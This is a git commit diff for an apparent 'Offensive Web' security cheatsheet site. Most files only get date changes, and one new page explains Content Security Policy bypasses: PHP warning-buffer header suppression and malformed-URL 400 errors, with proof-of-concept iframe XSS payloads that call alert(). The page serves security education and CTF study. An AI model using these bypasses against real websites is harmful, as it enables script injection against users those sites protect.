change date and add csp bypass

xanhacks · May 1, 2024 · 89070b3 · 89070b3
1 parent 7b29e77
commit 89070b3
Show file tree

Hide file tree

Showing 18 changed files with 150 additions and 30 deletions.
diff --git a/assets/images/php-headers-bypass-warning.jpg b/assets/images/php-headers-bypass-warning.jpg
diff --git a/content/docs/client-side/_index.md b/content/docs/client-side/_index.md
@@ -2,8 +2,8 @@
 title : "Client-side"
 description: "Offensive Web - Client-side"
 lead: "Offensive Web - Client-side"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/client-side/browser-cache.md b/content/docs/client-side/browser-cache.md
@@ -2,8 +2,8 @@
 title: "Browser Cache"
 description: "Answers to frequently asked questions."
 lead: "Answers to frequently asked questions."
-date: 2020-10-06T08:49:31+00:00
-lastmod: 2020-10-06T08:49:31+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/client-side/csp.md b/content/docs/client-side/csp.md
@@ -0,0 +1,102 @@
+---
+title: "CSP Bypass"
+description: "CSP Bypass."
+lead: "CSP Bypass."
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
+draft: false
+images: []
+menu:
+  docs:
+    parent: "client-side"
+weight: 630
+toc: true
+---
+
+## Definition
+
+Content Security Policy (CSP) is a HTTP response headers that helps prevent Cross-Site Scripting (XSS), clickjacking, and other client-side injection attacks. It allows website owners to specify which sources of content are trusted, ensuring that browsers only execute or render resources from those approved sources.
+
+- [Content Security Policy (CSP) - MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
+
+## Response Headers Manipulation
+
+### PHP Headers Bypass using Warnings
+
+PHP is known for buffering the response to 4096 bytes by default, so by providing enough data inside warnings, the response will be sent before the CSP header, causing the header to be ignored.
+
+![PHP Headers Bypass using Warnings](./images/php-headers-bypass-warning.jpg)
+
+Challenge source code:
+
+```php
+<?php
+header("Content-Security-Policy: default-src 'none';");
+if (isset($_GET["xss"])) echo $_GET["xss"];
+```
+
+Maximum parameters by default in PHP:
+- `$_GET`: 1000 parameters
+- `$_POST`: 1000 parameters
+- `$_FILES`: 20 files
+
+```python
+# ------------------[ <= 1000 parameters ]------------------
+>>> resp = requests.get('http://pilv.ar/?' + 'a=&' * 1000)
+>>> resp.text
+''
+>>> resp.headers.get('Content-Security-Policy')
+"default-src 'none';"
+# ------------------[ > 1000 parameters ]------------------
+>>> resp = requests.get('http://pilv.ar/?' + 'a=&' * 1001)
+>>> resp.text
+'<br />\n<b>Warning</b>:  PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in <b>Unknown</b> on line <b>0</b><br />\n<br />\n<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/var/www/html/index.php</b> on line <b>2</b><br />\n'
+>>> resp.headers.get('Content-Security-Policy')
+>>>
+```
+
+**References:**
+- [pilvar XSS challenge](https://x.com/pilvar222/status/1784618120902005070)
+- [Write-ups to justCTF [*] 2020 by @terjanq](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)
+
+### Abuse 400 Errors
+
+Use `%ZZ` or other non-valid URL-encoded characters to trigger a `Bad Request`. The response does not contain any security headers, such as `Content-Security-Policy`.
+
+Example with `nginx` as a reverse proxy:
+
+```js
+$ curl -v 'http://localhost/%ZZ'
+[...]
+< HTTP/1.1 400 Bad Request
+< Server: nginx/1.24.0
+< Date: Wed, 01 May 2024 10:28:11 GMT
+< Content-Type: text/html
+< Content-Length: 157
+< Connection: close
+<
+<html>
+<head><title>400 Bad Request</title></head>
+<body>
+<center><h1>400 Bad Request</h1></center>
+<hr><center>nginx/1.24.0</center>
+</body>
+</html>
+```
+
+Location: `about:blank`
+```js
+document.body.innerHTML="<iframe name=i src='/%ZZ' />"
+i.eval("alert(location.href)")
+```
+
+Location: `http://target.com/%ZZ`
+```js
+document.body.innerHTML="<iframe name=i src='/%ZZ' />"
+i.onload=setTimeout
+i.Event.prototype.toString=RegExp.prototype.toString
+i.Event.prototype.flags="-alert(location.href)"
+```
+
+**References:**
+- [Arbitrary Parentheses-less XSS against strict CSP policies](https://terjanq.medium.com/arbitrary-parentheses-less-xss-e4a1cf37c13d)
diff --git a/content/docs/client-side/jsonp.md b/content/docs/client-side/jsonp.md
@@ -2,8 +2,8 @@
 title: "JSONP"
 description: "Overview of JSONP."
 lead: "Overview of JSONP."
-date: 2020-10-06T08:49:31+00:00
-lastmod: 2020-10-06T08:49:31+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/client-side/service-worker.md b/content/docs/client-side/service-worker.md
@@ -2,8 +2,8 @@
 title: "Service Worker"
 description: "Regularly update the installed npm packages to keep your Doks website stable, usable, and secure."
 lead: "Regularly update the installed npm packages to keep your Doks website stable, usable, and secure."
-date: 2020-11-12T13:26:54+01:00
-lastmod: 2020-11-12T13:26:54+01:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/client-side/some.md b/content/docs/client-side/some.md
@@ -2,8 +2,8 @@
 title: "Same Origin Method Execution"
 description: "Cheatsheet on Same-Origin-Method-Execution (SOME)"
 lead: "Cheatsheet on Same-Origin-Method-Execution (SOME)"
-date: 2020-10-06T08:49:31+00:00
-lastmod: 2020-10-06T08:49:31+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/client-side/xsleaks.md b/content/docs/client-side/xsleaks.md
@@ -2,8 +2,8 @@
 title: "XSLeaks"
 description: "Cheatsheet on XSLeaks"
 lead: "Cheatsheet on XSLeaks"
-date: 2020-10-06T08:49:31+00:00
-lastmod: 2020-10-06T08:49:31+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/framework/_index.md b/content/docs/framework/_index.md
@@ -2,8 +2,8 @@
 title : "Framework"
 description: "Offensive Web - Framework"
 lead: "Offensive Web - Framework"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/getting-started/_index.md b/content/docs/getting-started/_index.md
@@ -2,8 +2,8 @@
 title : "Getting started"
 description: "Getting started"
 lead: "Getting started"
-date: 2020-10-06T08:48:45+00:00
-lastmod: 2020-10-06T08:48:45+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 weight: 100

diff --git a/content/docs/http/_index.md b/content/docs/http/_index.md
@@ -2,8 +2,8 @@
 title : "HTTP"
 description: "Offensive Web - HTTP"
 lead: "Offensive Web - HTTP"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/others/_index.md b/content/docs/others/_index.md
@@ -2,8 +2,8 @@
 title : "Others"
 description: "Offensive Web - Others"
 lead: "Offensive Web - Others"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/programming/javascript/_index.md b/content/docs/programming/javascript/_index.md
@@ -2,8 +2,8 @@
 title : "Javascript"
 description: "Offensive Web - Javascript"
 lead: "Offensive Web - Javascript"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/programming/php.md b/content/docs/programming/php.md
@@ -2,8 +2,8 @@
 title : "PHP"
 description: "Overview of the PHP programming language"
 lead: "Overview of the PHP programming language"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---

diff --git a/content/docs/server-side/_index.md b/content/docs/server-side/_index.md
@@ -2,8 +2,8 @@
 title : "Server-side"
 description: "Offensive Web - Server-side"
 lead: "Offensive Web - Server-side"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/content/docs/server-side/ssrf.md b/content/docs/server-side/ssrf.md
@@ -2,8 +2,8 @@
 title: "SSRF - Server-side Request Forgery"
 description: "Solutions to common problems."
 lead: "Solutions to common problems."
-date: 2020-11-12T15:22:20+01:00
-lastmod: 2020-11-12T15:22:20+01:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 menu:

diff --git a/content/docs/writeup/_index.md b/content/docs/writeup/_index.md
@@ -2,8 +2,8 @@
 title : "WriteUp"
 description: "Offensive Web - WriteUp"
 lead: "Offensive Web - WriteUp"
-date: 2020-10-06T08:48:23+00:00
-lastmod: 2020-10-06T08:48:23+00:00
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
 draft: false
 images: []
 ---
diff --git a/hugo_stats.json b/hugo_stats.json
@@ -273,6 +273,8 @@
       "206--applicationjson",
       "TableOfContents",
       "abritrary-file-read",
+      "abuse-400-errors",
+      "abuse-4xx-errors",
       "access-chromium-debugger-target-id",
       "account-takeover",
       "admin-account-into-rce",
@@ -312,6 +314,7 @@
       "conditional-breakpoint",
       "conditional-property-access",
       "content-type",
+      "content-type-that-can-be-used-for-xss",
       "cookie-bombing",
       "cookie-jar-overflow---overwriting-httponly-cookies",
       "cookie-ordering",
@@ -323,6 +326,7 @@
       "cross-origin-read-blocking-corb",
       "cross-origin-resource-policy-corp",
       "cross-origin-resource-sharing-cors",
+      "csp",
       "csp-bypass",
       "cve-2021-41773---path-traversal--potential-rce",
       "cve-2023-25690---request-smuggling",
@@ -336,6 +340,7 @@
       "doks-docs-nav",
       "domain",
       "domains-takeover",
+      "dompurify",
       "dos",
       "drupal",
       "ejs",
@@ -363,6 +368,7 @@
       "h-rh-i-0",
       "h-rh-i-1",
       "h-rh-i-2",
+      "heading",
       "hostonly",
       "how-corb-works",
       "html-parser-fuzzing",
@@ -374,9 +380,11 @@
       "inputsoutputs-scope",
       "insecure-deserialization",
       "introspection",
+      "ipv6",
       "javascript",
       "javascript-protocol",
       "jinja2",
+      "jsonp-endpoint-list",
       "key-aspects-of-corb",
       "lax-bypass",
       "let-and-var",
@@ -410,11 +418,13 @@
       "other-attributes",
       "others",
       "out-of-scope",
+      "parsing",
       "passing-request-headers",
       "path-traversal",
       "payloads",
       "permissions",
       "php",
+      "php-headers-bypass-using-warnings",
       "php-wrappers",
       "pin-in-debug-mode",
       "postgresql",
@@ -436,6 +446,7 @@
       "replacement-string",
       "reponse-delay-scanning",
       "resources",
+      "response-headers-manipulation",
       "restart-frame",
       "samesite",
       "script-loading-content-type-page",
@@ -482,6 +493,13 @@
       "variable-self",
       "variables",
       "version",
+      "version--200",
+      "version--2017",
+      "version--21",
+      "version--220",
+      "version--223",
+      "version--3010--3011",
+      "version--308",
       "vscode",
       "vue-router",
       "vuejs",